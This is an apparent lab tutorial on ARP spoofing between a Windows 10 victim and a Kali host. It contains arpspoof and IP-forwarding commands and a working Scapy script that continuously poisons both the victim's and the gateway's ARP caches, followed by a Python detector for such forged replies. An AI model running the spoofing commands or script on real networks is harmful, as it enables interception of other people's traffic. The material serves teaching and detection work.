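Lab environment:
One Windows 10 machine as the victim
One Linux machine as the attacking host. Make sure both hosts have Internet access and can reach each other; both hosts use NAT mode.
Windows 10 victim host: IP: 192.168.234.137 MAC: 00:0C:29:44:78:89
Kali Linux attacking host: IP: 192.168.234.139 MAC: 00:0c:29:13:99:f7
Gateway: IP: 192.168.234.2 MAC: 00:50:56:f4:ff:98 (can be looked up with arp -a)
1. Spoof Windows 10 by presenting the attacker's MAC address as the gateway's; at this point Windows 10 cannot access the Internet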
arpspoof -i eth0 -t 192.168.234.137 192.168.234.2
2. Enable traffic forwarding
echo 1 >> /proc/sys/net/ipv4/ip_forward
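Kali now plays the role of the gateway and forwards the traffic; capturing packets with Wireshark on Kali makes it possible to monitor Windows 10's Internet traffic.
Kali keeps sending ARP reply packets to Windows 10, telling Windows 10 that it is the gateway, so the traffic Windows 10 sends to the Internet is forwarded through Kali.
ARP spoofing implemented in Python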
from scapy.all import *
from scapy.layers.l2 import ARP, Ether, getmacbyip


def arp_spoof():
    iface = "VMware Virtual Ethernet Adapter for VMnet8"
    # Victim host
    target_ip = '192.168.234.137'
    target_mac = '00:0C:29:44:78:89'
    # Attacking host
    spoof_ip = '192.168.234.139'
    spoof_mac = '00:0c:29:13:99:f7'
    # Real gateway
    gateway_ip = '192.168.234.2'
    gateway_mac = getmacbyip(gateway_ip)
    # Build the packets
    while True:
        # Spoof the victim host. op=1: ARP request, op=2: ARP reply
        packet = Ether(src=spoof_mac, dst=target_mac) / ARP(hwsrc=spoof_mac, psrc=gateway_ip,
                                                            hwdst=target_mac, pdst=target_ip, op=2)  # reply packet, op=2
        sendp(packet, iface=iface)
        # Spoof the gateway
        packet = Ether(src=spoof_mac, dst=gateway_mac) / ARP(hwsrc=spoof_mac, psrc=target_ip,
                                                             hwdst=gateway_mac, pdst=gateway_ip, op=2)  # reply packet, op=2
        sendp(packet, iface=iface)


if __name__ == '__main__':
    arp_spoof()
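The forged replies described above leave a clear trace on the wire: the gateway IP is announced with a MAC other than the real gateway's, and one MAC answers for more than one IP. The following detector is an added example, not code from the original post. It uses only the Python standard library and replays constructed frames built from the lab addresses listed above; the function names and alert labels are assumptions.

```python
import socket
import struct

# Known-good gateway binding and host addresses, taken from the lab setup above.
GATEWAY_IP, GATEWAY_MAC = "192.168.234.2", "00:50:56:f4:ff:98"
WIN_IP, WIN_MAC = "192.168.234.137", "00:0c:29:44:78:89"
KALI_MAC = "00:0c:29:13:99:f7"
# EtherType ARP, then htype=Ethernet, ptype=IPv4, hlen=6, plen=4.
ARP_IPV4_PREFIX = b"\x08\x06\x00\x01\x08\x00\x06\x04"

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def build_arp_reply(hwsrc, psrc, hwdst, pdst):
    """Build a raw Ethernet+ARP reply frame; used only to construct sample input."""
    eth = mac_bytes(hwdst) + mac_bytes(hwsrc) + ARP_IPV4_PREFIX
    arp = struct.pack("!H", 2) + mac_bytes(hwsrc) + socket.inet_aton(psrc)
    return eth + arp + mac_bytes(hwdst) + socket.inet_aton(pdst)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip), or None if not ARP for IPv4 over Ethernet."""
    if len(frame) < 42 or frame[12:20] != ARP_IPV4_PREFIX:
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    return op, mac_str(frame[22:28]), socket.inet_ntoa(frame[28:32])

def detect(frames):
    """Flag replies contradicting the pinned gateway MAC, and MACs claiming several IPs."""
    alerts, claimed = [], {}
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:  # only ARP replies (op=2)
            continue
        _, hwsrc, psrc = parsed
        if psrc == GATEWAY_IP and hwsrc != GATEWAY_MAC:
            alerts.append(("gateway-mac-mismatch", psrc, hwsrc))
        ips = claimed.setdefault(hwsrc, set())
        if ips and psrc not in ips:
            alerts.append(("mac-claims-multiple-ips", psrc, hwsrc))
        ips.add(psrc)
    return alerts

# Constructed sample traffic: one genuine gateway reply, then the two forged replies.
SAMPLE = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, WIN_MAC, WIN_IP),
    build_arp_reply(KALI_MAC, GATEWAY_IP, WIN_MAC, WIN_IP),
    build_arp_reply(KALI_MAC, WIN_IP, GATEWAY_MAC, GATEWAY_IP),
]
```

A MAC answering for several IPs also occurs legitimately (proxy ARP, multihomed hosts), so treat the second alert as a lead to correlate with the gateway mismatch rather than as proof on its own.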